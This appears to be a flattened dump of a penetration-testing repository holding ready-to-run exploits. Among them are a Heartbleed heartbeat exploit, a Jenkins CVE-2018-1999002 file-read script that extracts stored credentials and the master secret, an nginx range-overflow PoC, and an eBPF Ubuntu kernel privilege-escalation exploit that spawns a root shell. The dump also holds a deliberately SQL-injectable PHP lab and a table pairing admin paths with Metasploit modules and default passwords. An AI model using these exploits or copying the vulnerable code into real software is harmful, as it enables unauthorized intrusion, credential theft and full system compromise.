options.print_help() 110 | return 111 | 112 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 113 | print 'Connecting...' 114 | sys.stdout.flush() 115 | s.connect((args[0], opts.port)) 116 | print 'Sending Client Hello...' 117 | sys.stdout.flush() 118 | s.send(hello) 119 | print 'Waiting for Server Hello...' 120 | sys.stdout.flush() 121 | while True: 122 | typ, ver, pay = recvmsg(s) 123 | if typ == None: 124 | print 'Server closed connection without sending Server Hello.' 125 | return 126 | # Look for server hello done message. 127 | if typ == 22 and ord(pay[0]) == 0x0E: 128 | break 129 | 130 | print 'Sending heartbeat request...' 131 | sys.stdout.flush() 132 | s.send(hb) 133 | hit_hb(s) 134 | 135 | if __name__ == '__main__': 136 | main() 137 | -------------------------------------------------------------------------------- /http_sys_test.py: -------------------------------------------------------------------------------- 1 | #sutff.py 2 | import socket 3 | import random 4 | 5 | ipAddr = "这里填入检测IP地址" 6 | hexAllFfff = "18446744073709551615" 7 | 8 | req1 = "GET / HTTP/1.0\r\n\r\n" 9 | req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n" 10 | 11 | print "[*] Audit Started" 12 | client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | client_socket.connect((ipAddr, 80)) 14 | client_socket.send(req1) 15 | boringResp = client_socket.recv(1024) 16 | if "Microsoft" not in boringResp: 17 | print "[*] Not IIS" 18 | exit(0) 19 | client_socket.close() 20 | client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | client_socket.connect((ipAddr, 80)) 22 | client_socket.send(req) 23 | goodResp = client_socket.recv(1024) 24 | if "Requested Range Not Satisfiable" in goodResp: 25 | print "[!!] Looks VULN" 26 | elif " The request has an invalid header name" in goodResp: 27 | print "[*] Looks Patched" 28 | else: 29 | print "[*] Unexpected response, cannot discern patch status" -------------------------------------------------------------------------------- /java_RMI/attackRMI.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmgy10/Pentest/5471245302db8c91cb2113aee1bfd1162ea29aca/java_RMI/attackRMI.jar -------------------------------------------------------------------------------- /java_RMI/e8f31202-138f-4a60-adb1-114cce64afe1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmgy10/Pentest/5471245302db8c91cb2113aee1bfd1162ea29aca/java_RMI/e8f31202-138f-4a60-adb1-114cce64afe1.jpg -------------------------------------------------------------------------------- /java_RMI/readme.md: -------------------------------------------------------------------------------- 1 | ### use : java -jar attackRMI ip:port 2 | 3 | ![](https://raw.githubusercontent.com/imr10/Pentest_T00ls/master/java_RMI/e8f31202-138f-4a60-adb1-114cce64afe1.jpg) 4 | -------------------------------------------------------------------------------- /jenkins_file_read/cve-2018-1999002.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import os 4 | import re 5 | 6 | 7 | 8 | def get_mes(host): 9 | num = 0 10 | url_pwd = host+'/plugin/jquery-detached/.xml' 11 | header_pwd = {'Accept-Language':'/../../../credentials'} 12 | url_hash = host+'/plugin/jquery-detached/.key' 13 | header_hash = {'Accept-Language':'/../../../secrets/master'} 14 | try: 15 | content_pwd = requests.get(url_pwd,headers=header_pwd,timeout=5).content 16 | pat_content = r'(.*?)' 17 | pat_user = r'(.*?)' 18 | pat_pwd = r'(.*)' 19 | content_part = re.findall(pat_content,content_pwd,re.S) 20 | for i in content_part: 21 | #print i 22 | i = i.replace('\n','') 23 | #print i 24 | users = re.findall(pat_user,i,re.S) 25 | pwds = re.findall(pat_pwd,i) 26 | print users[0]+' '+pwds[0] 27 | content_hash = requests.get(url_hash,headers=header_hash,timeout=5).content 28 | print '\nThe hash is :\n'+content_hash 29 | except Exception,e: 30 | print e 31 | pass 32 | 33 | 34 | if __name__=="__main__": 35 | if len(sys.argv) != 2: 36 | print 'usage:\n\tpython cve-2018-1999002.py [jenkins base url]' 37 | print 'exemple:\n\tpython cve-2018-1999002.py http://localhost:8080/' 38 | sys.exit(1) 39 | host = sys.argv[1] 40 | header_ini = {'Accept-Language':'/../../../../../../../../../windows/win'} 41 | url_ini = host+'/plugin/credentials/.ini' 42 | try: 43 | content_ini = requests.get(url_ini,headers=header_ini,timeout=5).content 44 | if 'for 16-bit app support' in content_ini: 45 | print host+' is Vulnerable\n' 46 | get_mes(host) 47 | else: 48 | print host+' is not Vulnerable\n' 49 | except Exception,e: 50 | print e 51 | print "Url connects error" 52 | -------------------------------------------------------------------------------- /jenkins_file_read/readme.md: -------------------------------------------------------------------------------- 1 | ## use: python *.py http://ip:port 2 | -------------------------------------------------------------------------------- /mongodb_unauth_access.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2.7 2 | #coding:utf-8 3 | 4 | import pymongo 5 | from dummy import * 6 | 7 | info = { 8 | 'NAME':'MongoDB Unauthorized Access', 9 | 'AUTHOR':'yangbh', 10 | 'TIME':'20141112', 11 | 'WEB':'http://drops.wooyun.org/%E8%BF%90%E7%BB%B4%E5%AE%89%E5%85%A8/2470', 12 | 'DESCRIPTION':'MongoDB配置不当导致未授权访问' 13 | } 14 | opts = { 15 | 'ip':'221.123.140.66', #'target ip' 16 | 'ports':[27017], 17 | } 18 | # opts = [ 19 | # ['ip','221.123.140.66','target ip'], 20 | # ['ports',[27017],'target ip\'s ports'] 21 | # ] 22 | 23 | def Assign(services): 24 | if services.has_key('ip') and services.has_key('ports'): 25 | return True 26 | return False 27 | 28 | def Audit(services): 29 | port = None 30 | ip = services['ip'] 31 | if 27017 in services['ports']: 32 | port = 27017 33 | elif 28017 in services['ports']: 34 | port = 28017 35 | if port: 36 | try: 37 | connection = pymongo.MongoClient(ip,port,socketTimeoutMS=3000) 38 | # connection.api.authenticate("root","1234") 39 | # db = connection.admin 40 | # db.system.users.find_one() 41 | dbs = connection.database_names() 42 | security_hole(ip+':'+str(port)+'/'+str(dbs)) 43 | logger(ip + ':' + str(port)+'/'+str(dbs)) 44 | except pymongo.errors.OperationFailure,e: 45 | logger('Exception:\t'+str(e)) 46 | # pass 47 | 48 | # ---------------------------------------------------------------------------------------------------- 49 | # untest yet 50 | # ---------------------------------------------------------------------------------------------------- 51 | if __name__=='__main__': 52 | ip ='www.eguan.cn' 53 | if len(sys.argv) == 2: 54 | ip = sys.argv[1] 55 | services = {'ip':ip,'ports':[27017]} 56 | Audit(services) 57 | pprint(services) 58 | -------------------------------------------------------------------------------- /nginx_range_overflow_cve-2017-7529.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # use: python3 poc.py http://xxx.com:8080 3 | import sys 4 | import requests 5 | 6 | if len(sys.argv) < 2: 7 | print("%s url" % (sys.argv[0])) 8 | print("eg: python %s http://your-ip:8080/" % (sys.argv[0])) 9 | sys.exit() 10 | 11 | headers = { 12 | 'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240" 13 | } 14 | offset = 605 15 | url = sys.argv[1] 16 | file_len = len(requests.get(url, headers=headers).content) 17 | n = file_len + offset 18 | headers['Range'] = "bytes=-%d,-%d" % ( 19 | n, 0x8000000000000000 - n) 20 | 21 | r = requests.get(url, headers=headers) 22 | print(r.text) 23 | -------------------------------------------------------------------------------- /sqlinject/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmgy10/Pentest/5471245302db8c91cb2113aee1bfd1162ea29aca/sqlinject/.DS_Store -------------------------------------------------------------------------------- /sqlinject/README.txt: -------------------------------------------------------------------------------- 1 | 修改conn.php 里面账号密码然后导入test.sql到数据库。 2 | -------------------------------------------------------------------------------- /sqlinject/admin.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 管理员登录 5 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 |




60 | 61 |
62 | 63 | 用户名: 64 | 65 |
66 | 密    码: 67 | 68 |
69 | 70 | 71 |
72 | 73 | -------------------------------------------------------------------------------- /sqlinject/admin_login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmgy10/Pentest/5471245302db8c91cb2113aee1bfd1162ea29aca/sqlinject/admin_login.php -------------------------------------------------------------------------------- /sqlinject/conn.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmgy10/Pentest/5471245302db8c91cb2113aee1bfd1162ea29aca/sqlinject/conn.php -------------------------------------------------------------------------------- /sqlinject/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | sql注入测试 5 | 8 | 9 | 10 | 11 |
12 | error:'.mysql_error().'

'); 24 | } 25 | echo "sql注入测试
"; 26 | echo ""; 27 | echo ""; 28 | echo ""; 29 | echo ""; 30 | echo ""; 31 | //遍历查询结果 32 | while ($row = mysql_fetch_array($result)) 33 | { 34 | if (!$row){ 35 | echo "该记录不存在"; 36 | exit; 37 | } 38 | echo ""; 39 | echo ""; 40 | echo ""; 41 | echo ""; 42 | echo ""; 43 | } 44 | echo ""; 45 | echo "
id标题内容
".$row[0]."".$row[1]."".$row[2]."
sql语句: >".$sql."
"; 46 | ?> 47 | 点我进入后台       48 | md5解密可以点我 49 | 50 | -------------------------------------------------------------------------------- /sqlinject/test.sql: -------------------------------------------------------------------------------- 1 | -- phpMyAdmin SQL Dump 2 | -- version phpStudy 2014 3 | -- http://www.phpmyadmin.net 4 | -- 5 | -- 主机: localhost 6 | -- 生成日期: 2016 年 05 月 31 日 14:16 7 | -- 服务器版本: 5.5.47 8 | -- PHP 版本: 5.3.29 9 | 10 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 11 | SET time_zone = "+00:00"; 12 | 13 | 14 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; 15 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; 16 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; 17 | /*!40101 SET NAMES utf8 */; 18 | 19 | -- 20 | -- 数据库: `test` 21 | -- 22 | 23 | -- -------------------------------------------------------- 24 | 25 | -- 26 | -- 表的结构 `admin` 27 | -- 28 | 29 | CREATE TABLE IF NOT EXISTS `admin` ( 30 | `id` int(3) NOT NULL AUTO_INCREMENT, 31 | `user` varchar(10) COLLATE utf8_unicode_ci NOT NULL, 32 | `pwd` varchar(32) COLLATE utf8_unicode_ci NOT NULL, 33 | PRIMARY KEY (`id`) 34 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=2 ; 35 | 36 | -- 37 | -- 转存表中的数据 `admin` 38 | -- 39 | 40 | INSERT INTO `admin` (`id`, `user`, `pwd`) VALUES 41 | (1, 'admin', '3f230640b78d7e71ac5514e57935eb69'); 42 | 43 | -- -------------------------------------------------------- 44 | 45 | -- 46 | -- 表的结构 `sqltest` 47 | -- 48 | 49 | CREATE TABLE IF NOT EXISTS `sqltest` ( 50 | `id` int(11) NOT NULL AUTO_INCREMENT, 51 | `title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '', 52 | `content` text CHARACTER SET utf8 NOT NULL, 53 | PRIMARY KEY (`id`) 54 | ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ; 55 | 56 | -- 57 | -- 转存表中的数据 `sqltest` 58 | -- 59 | 60 | INSERT INTO `sqltest` (`id`, `title`, `content`) VALUES 61 | (1, '第一个', '这是ID=1的数据\r\n1111111111111111111111111111111111111111'), 62 | (2, '第二个', '这是ID=2的数据\r\n2222222222222222222222222222222222222222'), 63 | (3, '第三个', '这是ID=3的数据\r\n3333333333333333333333333333333333333333'); 64 | 65 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; 66 | /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; 67 | /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; 68 | -------------------------------------------------------------------------------- /ubuntu_tiquan.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Ubuntu 16.04.4 kernel priv esc 3 | * 4 | * all credits to @bleidl 5 | * - vnik 6 | * use: gcc -o tiquan ubuntu_tiquan.c 7 | * ./tiquan 8 | */ 9 | 10 | // Tested on: 11 | // 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 12 | // if different kernel adjust CRED offset + check kernel stack size 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | 28 | #define PHYS_OFFSET 0xffff880000000000 29 | #define CRED_OFFSET 0x5f8 30 | #define UID_OFFSET 4 31 | #define LOG_BUF_SIZE 65536 32 | #define PROGSIZE 328 33 | 34 | int sockets[2]; 35 | int mapfd, progfd; 36 | 37 | char *__prog = "\xb4\x09\x00\x00\xff\xff\xff\xff" 38 | "\x55\x09\x02\x00\xff\xff\xff\xff" 39 | "\xb7\x00\x00\x00\x00\x00\x00\x00" 40 | "\x95\x00\x00\x00\x00\x00\x00\x00" 41 | "\x18\x19\x00\x00\x03\x00\x00\x00" 42 | "\x00\x00\x00\x00\x00\x00\x00\x00" 43 | "\xbf\x91\x00\x00\x00\x00\x00\x00" 44 | "\xbf\xa2\x00\x00\x00\x00\x00\x00" 45 | "\x07\x02\x00\x00\xfc\xff\xff\xff" 46 | "\x62\x0a\xfc\xff\x00\x00\x00\x00" 47 | "\x85\x00\x00\x00\x01\x00\x00\x00" 48 | "\x55\x00\x01\x00\x00\x00\x00\x00" 49 | "\x95\x00\x00\x00\x00\x00\x00\x00" 50 | "\x79\x06\x00\x00\x00\x00\x00\x00" 51 | "\xbf\x91\x00\x00\x00\x00\x00\x00" 52 | "\xbf\xa2\x00\x00\x00\x00\x00\x00" 53 | "\x07\x02\x00\x00\xfc\xff\xff\xff" 54 | "\x62\x0a\xfc\xff\x01\x00\x00\x00" 55 | "\x85\x00\x00\x00\x01\x00\x00\x00" 56 | "\x55\x00\x01\x00\x00\x00\x00\x00" 57 | "\x95\x00\x00\x00\x00\x00\x00\x00" 58 | "\x79\x07\x00\x00\x00\x00\x00\x00" 59 | "\xbf\x91\x00\x00\x00\x00\x00\x00" 60 | "\xbf\xa2\x00\x00\x00\x00\x00\x00" 61 | "\x07\x02\x00\x00\xfc\xff\xff\xff" 62 | "\x62\x0a\xfc\xff\x02\x00\x00\x00" 63 | "\x85\x00\x00\x00\x01\x00\x00\x00" 64 | "\x55\x00\x01\x00\x00\x00\x00\x00" 65 | "\x95\x00\x00\x00\x00\x00\x00\x00" 66 | "\x79\x08\x00\x00\x00\x00\x00\x00" 67 | "\xbf\x02\x00\x00\x00\x00\x00\x00" 68 | "\xb7\x00\x00\x00\x00\x00\x00\x00" 69 | "\x55\x06\x03\x00\x00\x00\x00\x00" 70 | "\x79\x73\x00\x00\x00\x00\x00\x00" 71 | "\x7b\x32\x00\x00\x00\x00\x00\x00" 72 | "\x95\x00\x00\x00\x00\x00\x00\x00" 73 | "\x55\x06\x02\x00\x01\x00\x00\x00" 74 | "\x7b\xa2\x00\x00\x00\x00\x00\x00" 75 | "\x95\x00\x00\x00\x00\x00\x00\x00" 76 | "\x7b\x87\x00\x00\x00\x00\x00\x00" 77 | "\x95\x00\x00\x00\x00\x00\x00\x00"; 78 | 79 | char bpf_log_buf[LOG_BUF_SIZE]; 80 | 81 | static int bpf_prog_load(enum bpf_prog_type prog_type, 82 | const struct bpf_insn *insns, int prog_len, 83 | const char *license, int kern_version) { 84 | union bpf_attr attr = { 85 | .prog_type = prog_type, 86 | .insns = (__u64)insns, 87 | .insn_cnt = prog_len / sizeof(struct bpf_insn), 88 | .license = (__u64)license, 89 | .log_buf = (__u64)bpf_log_buf, 90 | .log_size = LOG_BUF_SIZE, 91 | .log_level = 1, 92 | }; 93 | 94 | attr.kern_version = kern_version; 95 | 96 | bpf_log_buf[0] = 0; 97 | 98 | return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)); 99 | } 100 | 101 | static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size, 102 | int max_entries) { 103 | union bpf_attr attr = { 104 | .map_type = map_type, 105 | .key_size = key_size, 106 | .value_size = value_size, 107 | .max_entries = max_entries 108 | }; 109 | 110 | return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr)); 111 | } 112 | 113 | static int bpf_update_elem(uint64_t key, uint64_t value) { 114 | union bpf_attr attr = { 115 | .map_fd = mapfd, 116 | .key = (__u64)&key, 117 | .value = (__u64)&value, 118 | .flags = 0, 119 | }; 120 | 121 | return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)); 122 | } 123 | 124 | static int bpf_lookup_elem(void *key, void *value) { 125 | union bpf_attr attr = { 126 | .map_fd = mapfd, 127 | .key = (__u64)key, 128 | .value = (__u64)value, 129 | }; 130 | 131 | return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)); 132 | } 133 | 134 | static void __exit(char *err) { 135 | fprintf(stderr, "error: %s\n", err); 136 | exit(-1); 137 | } 138 | 139 | static void prep(void) { 140 | mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3); 141 | if (mapfd < 0) 142 | __exit(strerror(errno)); 143 | 144 | progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, 145 | (struct bpf_insn *)__prog, PROGSIZE, "GPL", 0); 146 | 147 | if (progfd < 0) 148 | __exit(strerror(errno)); 149 | 150 | if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) 151 | __exit(strerror(errno)); 152 | 153 | if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) 154 | __exit(strerror(errno)); 155 | } 156 | 157 | static void writemsg(void) { 158 | char buffer[64]; 159 | 160 | ssize_t n = write(sockets[0], buffer, sizeof(buffer)); 161 | 162 | if (n < 0) { 163 | perror("write"); 164 | return; 165 | } 166 | if (n != sizeof(buffer)) 167 | fprintf(stderr, "short write: %lu\n", n); 168 | } 169 | 170 | #define __update_elem(a, b, c) \ 171 | bpf_update_elem(0, (a)); \ 172 | bpf_update_elem(1, (b)); \ 173 | bpf_update_elem(2, (c)); \ 174 | writemsg(); 175 | 176 | static uint64_t get_value(int key) { 177 | uint64_t value; 178 | 179 | if (bpf_lookup_elem(&key, &value)) 180 | __exit(strerror(errno)); 181 | 182 | return value; 183 | } 184 | 185 | static uint64_t __get_fp(void) { 186 | __update_elem(1, 0, 0); 187 | 188 | return get_value(2); 189 | } 190 | 191 | static uint64_t __read(uint64_t addr) { 192 | __update_elem(0, addr, 0); 193 | 194 | return get_value(2); 195 | } 196 | 197 | static void __write(uint64_t addr, uint64_t val) { 198 | __update_elem(2, addr, val); 199 | } 200 | 201 | static uint64_t get_sp(uint64_t addr) { 202 | return addr & ~(0x4000 - 1); 203 | } 204 | 205 | static void pwn(void) { 206 | uint64_t fp, sp, task_struct, credptr, uidptr; 207 | 208 | fp = __get_fp(); 209 | if (fp < PHYS_OFFSET) 210 | __exit("bogus fp"); 211 | 212 | sp = get_sp(fp); 213 | if (sp < PHYS_OFFSET) 214 | __exit("bogus sp"); 215 | 216 | task_struct = __read(sp); 217 | 218 | if (task_struct < PHYS_OFFSET) 219 | __exit("bogus task ptr"); 220 | 221 | printf("task_struct = %lx\n", task_struct); 222 | 223 | credptr = __read(task_struct + CRED_OFFSET); // cred 224 | 225 | if (credptr < PHYS_OFFSET) 226 | __exit("bogus cred ptr"); 227 | 228 | uidptr = credptr + UID_OFFSET; // uid 229 | if (uidptr < PHYS_OFFSET) 230 | __exit("bogus uid ptr"); 231 | 232 | printf("uidptr = %lx\n", uidptr); 233 | __write(uidptr, 0); // set both uid and gid to 0 234 | 235 | if (getuid() == 0) { 236 | printf("spawning root shell\n"); 237 | system("/bin/bash"); 238 | exit(0); 239 | } 240 | 241 | __exit("not vulnerable?"); 242 | } 243 | 244 | int main(int argc, char **argv) { 245 | prep(); 246 | pwn(); 247 | 248 | return 0; 249 | } 250 | -------------------------------------------------------------------------------- /web_path+mima+msf_exp.md: -------------------------------------------------------------------------------- 1 | JBoss jmx-console: 2 | 路径1: '/jmx-console' 3 | 路径2: '/jmx-console/' 4 | 版本: '' 5 | exp: './exploit/multi/http/jboss_deploymentfilerepository' 6 | 默认密码: 'admin:admin' 7 | 8 | Apache Tomcat: 9 | 路径1: '/manager/html' 10 | 路径2: '/manager' 11 | 版本: '' 12 | exp: './exploits/multi/http/tomcat_mgr_upload.rb' 13 | 默认密码: 'tomcat:tomcat' 14 | 15 | Testlink: 16 | 路径1: '/testlink-1.9.3/login.php' 17 | 路径2: '/testlink/login.php' 18 | 版本: '' 19 | exp: './exploits/multi/http/testlink_upload_exec.rb' 20 | 默认密码: 'admin:admin' 21 | 22 | Hudson Jenkins: 23 | 路径1: '/jenkins/login?from=/jenkins/' 24 | 路径2: '/jenkins/' 25 | 版本: '' 26 | exp: './auxiliary/scanner/http/jenkins_enum.rb, ./exploits/multi/http/jenkins_script_console.rb' 27 | 默认密码: 'admin:admin' 28 | 29 | Apache Axis2: 30 | 路径1: '/axis2/axis2-admin' 31 | 路径2: '' 32 | 版本: '' 33 | exp: 'blank' 34 | 默认密码: 'admin:axis2' 35 | 36 | Ektron CMS: 37 | 路径1: '/cms400min/' 38 | 路径2: '' 39 | 版本: '' 40 | exp: './exploits/windows/http/ektron_xslt_exec.rb' 41 | 默认密码: 'admin:admin' 42 | 43 | HP Intelligent Management Center: 44 | 路径1: '/imc' 45 | 路径2: '' 46 | 版本: '' 47 | exp: './exploits/windows/http/hp_imc_mibfileupload.rb, ./auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb' 48 | 默认密码: 'admin:admin' 49 | 50 | Umbraco CMS: 51 | 路径1: '/umbraco/' 52 | 路径2: '' 53 | 版本: '' 54 | exp: './exploits/windows/http/umbraco_upload_aspx.rb' 55 | 默认密码: 'admin:admin' 56 | 57 | Easy File Management Web Server: 58 | 路径1: '/vfolder.ghp' 59 | 路径2: '' 60 | 版本: '' 61 | exp: './exploits/windows/http/efs_fmws_userid_bof.rb' 62 | 默认密码: 'admin:admin' 63 | 64 | VMware ESXi: 65 | 路径1: '/folder?dcPath=ha-datacenter' 66 | 路径2: '/mob' 67 | 版本: '' 68 | exp: '' 69 | 默认密码: 'admin:admin' 70 | 71 | SAP ConfigServlet: 72 | 路径1: '/ctc/servlet' 73 | 路径2: '' 74 | 版本: '' 75 | exp: './exploits/windows/http/sap_configservlet_exec_noauth.rb, ./auxiliary/admin/sap/sap_configservlet_exec_noauth.rb' 76 | 默认密码: 'admin:admin' 77 | 78 | HP SiteScope: 79 | 路径1: '/SiteScope/' 80 | 路径2: '' 81 | 版本: '' 82 | exp: './exploits/windows/http/hp_sitescope_runomagentcommand.rb, ./exploits/multi/http/hp_sitescope_uploadfileshandler.rb, ./exploits/multi/http/hp_sitescope_issuesiebelcmd.rb, ./auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb, ./auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb, ./auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb' 83 | 默认密码: 'admin:admin' 84 | 85 | Owl Intranet Engine: 86 | 路径1: '/owl/admin/index.php?userid=1&newuser' 87 | 路径2: '/owl/admin/index.php?userid=1&action=edituser&owluser=1' 88 | 版本: '' 89 | exp: 'https://www.exploit-db.com/exploits/36456/' 90 | 默认密码: 'admin:admin' 91 | 92 | Oracle Endeca Server: 93 | 路径1: '/ws/control' 94 | 路径2: '' 95 | 版本: '' 96 | exp: './exploits/windows/http/oracle_endeca_exec.rb' 97 | 默认密码: 'admin:admin' 98 | 99 | HP AutoPass License Server: 100 | 路径1: '/autopass' 101 | 路径2: '' 102 | 版本: '' 103 | exp: './exploits/windows/http/hp_autopass_license_traversal.rb' 104 | 默认密码: 'admin:admin' 105 | 106 | Dell SonicWALL (Plixer) Scrutinizer: 107 | 路径1: '/d4d/statusFilter.php' 108 | 路径2: '' 109 | 版本: '' 110 | exp: './exploits/windows/http/sonicwall_scrutinizer_sqli.rb' 111 | 默认密码: 'admin:admin' 112 | 113 | v0pCr3w: 114 | 路径1: '/jos.php' 115 | 路径2: '' 116 | 版本: '' 117 | exp: './exploits/multi/http/v0pcr3w_exec.rb' 118 | 默认密码: 'admin:admin' 119 | 120 | Moodle: 121 | 路径1: '/moodle/' 122 | 路径2: '' 123 | 版本: '' 124 | exp: './exploits/multi/http/moodle_cmd_exec.rb' 125 | 默认密码: 'admin:admin' 126 | 127 | Auxilium RateMyPet: 128 | 路径1: '/Auxiliumpetratepro/' 129 | 路径2: '' 130 | 版本: '' 131 | exp: './exploits/multi/http/auxilium_upload_exec.rb' 132 | 默认密码: 'admin:admin' 133 | 134 | STUNSHELL: 135 | 路径1: '/IDC.php' 136 | 路径2: '' 137 | 版本: '' 138 | exp: './exploits/multi/http/stunshell_eval.rb' 139 | 默认密码: 'admin:admin' 140 | 141 | Sflog CMS: 142 | 路径1: '/sflog/' 143 | 路径2: '' 144 | 版本: '' 145 | exp: './exploits/multi/http/sflog_upload_exec.rb' 146 | 默认密码: 'admin:admin' 147 | 148 | Apache Struts: 149 | 路径1: '/struts2-blank/example/HelloWorld.action' 150 | 路径2: '/blank-struts2/login.action' 151 | 版本: '' 152 | exp: './exploits/multi/http/struts_code_exec_classloader.rb, ./exploits/multi/http/struts_code_exec_parameters.rb, ./exploits/multi/http/struts_default_action_mapper.rb' 153 | 默认密码: 'admin:admin' 154 | 155 | Apache Struts: 156 | 路径1: '/blank-struts2/login.action' 157 | 路径2: '' 158 | 版本: '' 159 | exp: './exploits/multi/http/struts_code_exec_parameters.rb' 160 | 默认密码: 'admin:admin' 161 | 162 | MobileCartly: 163 | 路径1: '/mobilecartly/' 164 | 路径2: '' 165 | 版本: '' 166 | exp: './exploits/multi/http/mobilecartly_upload_exec.rb' 167 | 默认密码: 'admin:admin' 168 | 169 | MediaWiki: 170 | 路径1: '/mediawiki/index.php?title=Special:UserLogin&returnto=Main_Page' 171 | 路径2: '' 172 | 版本: '' 173 | exp: './exploits/multi/http/mediawiki_thumb.rb' 174 | 默认密码: 'admin:password' 175 | 176 | qdPM: 177 | 路径1: '/qdPM/' 178 | 路径2: '' 179 | 版本: '' 180 | exp: './exploits/multi/http/qdpm_upload_exec.rb' 181 | 默认密码: 'admin:admin' 182 | 183 | WebPageTest: 184 | 路径1: '/gettext.php' 185 | 路径2: '/work/resultimage.php' 186 | 版本: '' 187 | exp: './exploits/multi/http/webpagetest_upload_exec.rb' 188 | 默认密码: 'admin:admin' 189 | 190 | GestioIP: 191 | 路径1: '/gestioip/' 192 | 路径2: '' 193 | 版本: '' 194 | exp: './exploits/multi/http/gestioip_exec.rb' 195 | 默认密码: 'admin:admin' 196 | 197 | PolarBear CMS: 198 | 路径1: '/polarbearcms' 199 | 路径2: '' 200 | 版本: '' 201 | exp: './exploits/multi/http/polarcms_upload_exec.rb' 202 | 默认密码: 'admin:admin' 203 | 204 | JBoss: 205 | 路径1: '/invoker/JMXInvokerServlet' 206 | 路径2: '' 207 | 版本: '' 208 | exp: './exploits/multi/http/jboss_invoke_deploy.rb' 209 | 默认密码: 'admin:admin' 210 | 211 | Log1 CMS: 212 | 路径1: '/log1cms2.0/' 213 | 路径2: '' 214 | 版本: '' 215 | exp: './exploits/multi/http/log1cms_ajax_create_folder.rb' 216 | 默认密码: 'admin:admin' 217 | 218 | WikkaWiki: 219 | 路径1: '/wikka/' 220 | 路径2: '' 221 | 版本: '' 222 | exp: './exploits/multi/http/wikka_spam_exec.rb' 223 | 默认密码: 'admin:admin' 224 | 225 | CuteFlow: 226 | 路径1: '/cuteflow_v.2.11.2/' 227 | 路径2: '' 228 | 版本: '' 229 | exp: './exploits/multi/http/cuteflow_upload_exec.rb' 230 | 默认密码: 'admin:admin' 231 | 232 | Apache Roller: 233 | 路径1: '/roller' 234 | 路径2: '' 235 | 版本: '' 236 | exp: './exploits/multi/http/apache_roller_ognl_injection.rb' 237 | 默认密码: 'admin:admin' 238 | 239 | PhpTax pfilez: 240 | 路径1: '/phptax/' 241 | 路径2: '' 242 | 版本: '' 243 | exp: './exploits/multi/http/phptax_exec.rb' 244 | 默认密码: 'admin:admin' 245 | 246 | AjaXplorer: 247 | 路径1: '/AjaXplorer-2.5.5/plugins/access.ssh/checkInstall.php' 248 | 路径2: '' 249 | 版本: '' 250 | exp: './exploits/multi/http/ajaxplorer_checkinstall_exec.rb' 251 | 默认密码: 'admin:admin' 252 | 253 | phpMyAdmin: 254 | 路径1: '/phpmyadmin/' 255 | 路径2: '' 256 | 版本: '' 257 | exp: './exploits/multi/http/phpmyadmin_preg_replace.rb' 258 | 默认密码: 'admin:admin' 259 | 260 | vTiger CRM: 261 | 路径1: '/vtigercrm/index.php?action=index&module=Home' 262 | 路径2: '/vtigercrm/index.php?module=Settings&action=ModuleManager&parenttab=Settings' 263 | 版本: '' 264 | exp: './exploits/multi/http/vtiger_soap_upload.rb, ./exploits/multi/http/vtiger_php_exec.rb' 265 | 默认密码: 'admin:admin' 266 | 267 | eXtplorer: 268 | 路径1: '/com_extplorer_2.1.0/' 269 | 路径2: '' 270 | 